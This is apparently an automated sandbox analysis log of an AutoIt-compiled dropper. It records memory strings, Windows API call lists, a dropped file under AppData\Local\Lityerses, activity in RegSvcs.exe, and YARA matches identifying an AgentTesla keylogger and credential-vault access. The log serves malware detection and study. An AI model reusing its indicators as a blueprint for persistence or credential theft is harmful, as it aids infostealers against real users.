Source: RHOqJ5BrHW.exe, 00000000.00000000.2040085321.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9838d702-f
Source: RHOqJ5BrHW.exe, 00000000.00000003.2048929871.00000000030BD000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_49020a0b-0
Source: RHOqJ5BrHW.exe, 00000000.00000003.2048929871.00000000030BD000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d5828f2f-6
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: This is a third-party compiled AutoIt script. 2_2_00423D19
Source: unjuridically.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: unjuridically.exe, 00000002.00000002.2066346733.00000000004CE000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_651c0cca-8
Source: unjuridically.exe, 00000002.00000002.2066346733.00000000004CE000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: ESDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3403fd85-5
Source: unjuridically.exe, 00000005.00000000.2180196592.00000000004CE000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_56a5a7c7-d
                Source: unjuridically.exe, 00000005.00000000.2180196592.00000000004CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: ESDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e59f2ef1-a
                Source: RHOqJ5BrHW.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6bb84482-e
                Source: RHOqJ5BrHW.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d10e30a0-d
                Source: unjuridically.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6d2cdac5-4
                Source: unjuridically.exe.0.drString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b1169155-c
                Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00983742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009F00AF NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009F0133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009F044C NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EE9AF NtdllDialogWndProc_W,CallWindowProcW
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099AAFC NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099AB4F NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EECD4 6F58C580,6F58C6F0,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EEC7C NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EEEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099B11F NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF2D0 SendMessageW,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099B385 GetParent,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF5AB NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF5DA NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099B55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF689 ClientToScreen,6F58C5D0,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF609 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF654 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF7C3 GetWindowLongW,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,6F58CB00,6F58C2F0,SetCapture,ClientToScreen,6F58C530,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099B715 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00423742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004900AF NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00490133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0049044C NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048E9AF NtdllDialogWndProc_W,CallWindowProcW
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0043AAFC NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0043AB4F NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048EC7C NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048ECD4 6F58C580,6F58C6F0,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0043B11F NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F2D0 SendMessageW,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0043B385 GetParent,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0043B55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F5DA NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F5AB NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F654 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F609 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F689 ClientToScreen,6F58C5D0,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0043B715 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F7C3 GetWindowLongW,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,6F58CB00,6F58C2F0,SetCapture,ClientToScreen,6F58C530,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009C6685: CreateFileW,DeviceIoControl,CloseHandle
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74745590,74747ED0,CreateProcessAsUserW,74745030,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,74747F30
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009AB043
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009B410F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009A02A4
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009B038E
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0098E3B0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009A06D9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009B467F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EAACE
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009B4BEF
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009ACCC1
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00986F07
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0098AF50
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009E31BC
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009AD1B9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099B11F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00993200
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009A123A
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009B724D
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009C13CA
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009893F0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099F563
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009CB6CC
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009896C0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009877B0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF7FF
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009B79C9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099FA57
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00993B70
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00989B60
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00987D19
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009A9ED0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099FE6F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00987FA3
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00CAB478
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0044B043
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00433B70
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0045410F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004402A4
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0042E3E3
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0045038E
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0045467F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004406D9
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048AACE
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00454BEF
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0044CCC1
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0042AF50
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00426F07
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0043B11F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004831BC
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0044D1B9
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0045724D
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00433200
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0044123A
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004613CA
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004293F0
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0043F563
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004296C0
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0046B6CC
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F7FF
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004277B0
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004579C9
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0043FA57
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00429B60
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00427D19
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0043FE6F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00449ED0
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00427FA3
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00CAFFF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00DCB48A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00DC4A88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00DCAD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00DC3E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00DC41B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062A7E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062A66C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062A2440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062A5270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062AC270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062AB318
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062A7770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062AE478
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062A0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062A59C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062A001F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 5_2_016D6388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_02E941B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_02E94A88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_02E93E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_02E9ECD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_02E9AD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_067DC380
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_067DAAE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_068566C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_06855670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0685C270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0685B30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_06853138
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_06857E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_06857770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0685E478
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_06850040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_06855DAB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0685003C
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: String function: 0043EC2F appears 68 times
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: String function: 00446AC0 appears 42 times
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: String function: 0044F8A0 appears 35 times
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: String function: 009AF8A0 appears 35 times
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: String function: 0099EC2F appears 68 times
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: String function: 009A6AC0 appears 42 times
                Source: RHOqJ5BrHW.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
